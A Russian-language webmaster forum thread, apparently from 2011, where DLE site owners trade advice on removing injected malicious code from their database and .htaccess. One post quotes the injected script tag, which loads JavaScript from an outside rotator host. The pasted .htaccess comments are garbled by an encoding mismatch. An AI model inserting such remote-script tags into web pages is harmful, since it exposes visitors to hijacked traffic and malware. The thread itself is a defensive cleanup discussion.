Вредоносный код на сайте DLE

Скачайте, инструкция внутри:

После этого ставьте фиксы -

Это "Недостаточная фильтрация входящих данных". Вредоносный код в базе данных, в dle posts, чистить нужно именно там.

Ну а про заплатки Вам уже написали.

Зы нужна будет помощь - обращайтесь, помогу.

Спасибо, вроде сделал. Дыру закрыл и базу данных бэкап сделал. Вроде все норм.

webmaster116 добавил 24.11.2011 в 18:49

а вообще интересно зачем им это? заливать такой скрипт если все равно браузеры блокируют

Скорее всего, сливают трафик в партнерки.

Вот такая же проблема.... только вот тьакой вот скрипт...

<script type="text/javascript">

<script src="http://uno.wb-rotator.info/?t=br&noadult=1&pid=35625" language="javascript">

Сделал все как писал Pro-host, но не помогло....

WebGomel, вы писали, что нужно править в dle posts. Т. е. через phpMyAdmins?

GrimmR добавил 25.11.2011 в 00:00

Я заметил что сегодня был переделан фаил .htaccess

RewriteEngine On





    # Редирект для категорий (чтобы в конце URL был /)

RewriteBase /

RewriteCond %{REQUEST_FILENAME} !-f

RewriteCond %{REQUEST_FILENAME} !-d

RewriteCond %{REQUEST_URI} !-f

RewriteCond %{REQUEST_URI} !/$

RewriteCond %{REQUEST_URI} !.html$

RewriteCond %{REQUEST_URI} !.xml$

RewriteRule (.+) $1/ [R=301,L]



    # Редирект c www на без www

RewriteCond %{HTTP_HOST} ^www.outfilms.ru

RewriteRule ^(.*)$ http://site.ru/$1 [R=permanent,L]



    # Редирект для главной (с /index.php,html на /)

RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /index\.html\ HTTP/

RewriteRule ^index\.html$ / [R=301,L]

RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /index\.php\ HTTP/

RewriteRule ^index\.php$ / [R=301,L]



php_value register_globals 0



AddDefaultCharset windows-1251





# ╤ехй░цл▓

RewriteRule ^page/(.*)$ index.php?cstart=$1 [L]



# ╥аьбпя▓▓

RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/page,([0-9]+),([0-9]+),(.*).html(/?)+$ index.php?subaction=showfull&year=$1&month=$2&day=$3&news_page=$4&cstart=$5&news_name=$6 [L]

RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/page,([0-9]+),(.*).html(/?)+$ index.php?subaction=showfull&year=$1&month=$2&day=$3&news_page=$4&news_name=$5 [L]

RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/print:page,([0-9]+),(.*).html(/?)+$ engine/print.php?subaction=showfull&year=$1&month=$2&day=$3&news_page=$4&news_name=$5 [L]

RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/(.*).html(/?)+$ index.php?subaction=showfull&year=$1&month=$2&day=$3&news_name=$4 [L]



RewriteRule ^([^.]+)/page,([0-9]+),([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$4&news_page=$2&cstart=$3 [L]

RewriteRule ^([^.]+)/page,([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$3&news_page=$2 [L]

RewriteRule ^([^.]+)/print:page,([0-9]+),([0-9]+)-(.*).html(/?)+$ engine/print.php?news_page=$2&newsid=$3 [L]

RewriteRule ^([^.]+)/([0-9]+)-(.*).html(/?)+$ index.php?newsid=$2 [L]



RewriteRule ^page,([0-9]+),([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$3&news_page=$1&cstart=$2 [L]

RewriteRule ^page,([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$2&news_page=$1 [L]

RewriteRule ^print:page,([0-9]+),([0-9]+)-(.*).html(/?)+$ engine/print.php?news_page=$1&newsid=$2 [L]

RewriteRule ^([0-9]+)-(.*).html(/?)+$ index.php?newsid=$1 [L]



# ╚а хжн

RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})(/?)+$ index.php?year=$1&month=$2&day=$3 [L]

RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/page/([0-9]+)(/?)+$ index.php?year=$1&month=$2&day=$3&cstart=$4 [L]

# ╚а уж▒ эж▒

RewriteRule ^([0-9]{4})/([0-9]{2})(/?)+$ index.php?year=$1&month=$2 [L]

RewriteRule ^([0-9]{4})/([0-9]{2})/page/([0-9]+)(/?)+$ index.php?year=$1&month=$2&cstart=$3 [L]

# ├╗упд шаауж▒ фпд

RewriteRule ^([0-9]{4})(/?)+$ index.php?year=$1 [L]

RewriteRule ^([0-9]{4})/page/([0-9]+)(/?)+$ index.php?year=$1&cstart=$2 [L]

# у╝вядая│дцм╝юпм цд│

RewriteRule ^tags/([^/]*)(/?)+$ index.php?do=tags&tag=$1 [L]

RewriteRule ^tags/([^/]*)/page/([0-9]+)(/?)+$ index.php?do=tags&tag=$1&cstart=$2 [L]

# у╝вядахм┐ я│дцм╝юпгюб╛шж░═КRewriteRule ^user/([^/]*)/rss.xml$ engine/rss.php?subaction=allnews&user=$1 [L]

RewriteRule ^user/([^/]*)(/?)+$ index.php?subaction=userinfo&user=$1 [L]

RewriteRule ^user/([^/]*)/page/([0-9]+)(/?)+$ index.php?subaction=userinfo&user=$1&cstart=$2 [L]

RewriteRule ^user/([^/]*)/news(/?)+$ index.php?subaction=allnews&user=$1 [L]

RewriteRule ^user/([^/]*)/news/page/([0-9]+)(/?)+$ index.php?subaction=allnews&user=$1&cstart=$2 [L]

RewriteRule ^user/([^/]*)/news/rss.xml(/?)+$ engine/rss.php?subaction=allnews&user=$1 [L]

# у╝вядау▓е рп▒ьждюй╡ юпвя▓▓цйН

RewriteRule ^lastnews/(/?)+$ index.php?do=lastnews [L]

RewriteRule ^lastnews/page/([0-9]+)(/?)+$ index.php?do=lastnews&cstart=$1 [L]

# у╝вядатбвщее ыб▓смофаН

RewriteRule ^catalog/([^/]*)/rss.xml$ engine/rss.php?catalog=$1 [L]

RewriteRule ^catalog/([^/]*)(/?)+$ index.php?catalog=$1 [L]

RewriteRule ^catalog/([^/]*)/page/([0-9]+)(/?)+$ index.php?catalog=$1&cstart=$2 [L]

# у╝вядаюжпя╕исон с│ещНКRewriteRule ^newposts(/?)+$ index.php?subaction=newposts [L]

RewriteRule ^newposts/page/([0-9]+)(/?)+$ index.php?subaction=newposts&cstart=$1 [L]

# ╥▓с│ищ╕еыйе сои

RewriteRule ^static/(.*).html(/?)+$ index.php?do=static&page=$1 [L]

# у╝вядащибсон с│ещНКRewriteRule ^favorites(/?)+$ index.php?do=favorites [L]

RewriteRule ^favorites/page/([0-9]+)(/?)+$ index.php?do=favorites&cstart=$1 [L]



RewriteRule ^rules.html$ index.php?do=rules [L]

RewriteRule ^statistics.html$ index.php?do=stats [L]

RewriteRule ^addnews.html$ index.php?do=addnews [L]

RewriteRule ^rss.xml$ engine/rss.php [L]

RewriteRule ^sitemap.xml$ uploads/sitemap.xml [L]

RewriteRule ^([^<]+)/sblocks.xml$ engine/rss_sblocks.php?block=$1 [L]

RewriteRule ^([^<]+)/sblocks.xml/([0-9]+)$ engine/rss_sblocks.php?block=$1&page=$2 [L]

RewriteRule ^([^<]+)/informer(/?)+$ engine/sblocks_informer.php?inform=$1 [L]



RewriteCond %{REQUEST_FILENAME} !-d

RewriteRule ^([^.]+)/page/([0-9]+)(/?)+$ index.php?do=cat&category=$1&cstart=$2 [L]

RewriteRule ^([^.]+)/?$ index.php?do=cat&category=$1 [L]



RewriteCond %{REQUEST_FILENAME} !-f

RewriteRule ^([^.]+)/rss.xml$ engine/rss.php?do=cat&category=$1 [L]

RewriteRule ^page,([0-9]+),([^/]+).html$ index.php?do=static&page=$2&news_page=$1 [L]

RewriteRule ^print:([^/]+).html$ engine/print.php?do=static&page=$1 [L]



RewriteCond %{REQUEST_FILENAME} !-f

RewriteRule ^([^/]+).html$ index.php?do=static&page=$1 [L]

Но я не могу найти код...

Стучите в асю, поможем!

Хех... С вирусом я разобрался... При помощи Fix.php , но у меня нет половины постов. А резервную копию базы данных не сделал... Но это не беда... У меня хостер jino он автоматически сделал БД, но я не могу ее в DLE установить... Пишет ошибка... Что сделать надо?

Все... установил... Я устанавливал через PhPMyAdmins. Теперь сайт очень медленно загружается.... Подскажите, пожалуйста, что делать....

Если ДЛЕ, и если код после каждой новости, то это в базе. И лечится либо скриптом от Pro-host, либо ручками например через phpMyAdmin (если конечно постов не много).

Если постов много и скрипт не помогает - тогда вариант: скачиваем дамп, проходимся поиском\заменой, и заливаем дамп на место. Если код каждый раз разный, например как у ТС, то искать хорошо через MS Ofis.

После удаления кода обязательно ставить заплатки.

Если код вируса не в базе, то это уже другая история.

Если будет кому-либо нужна помощь - всегда можете обращаться.

Нулед что ли у вас мде.

Во общем, теперь хоть баннеры не вылетают, но теперь с нескольких новостей идет редирект на "Российскую базу фамилий".... Не знаю, где найти этот редирект....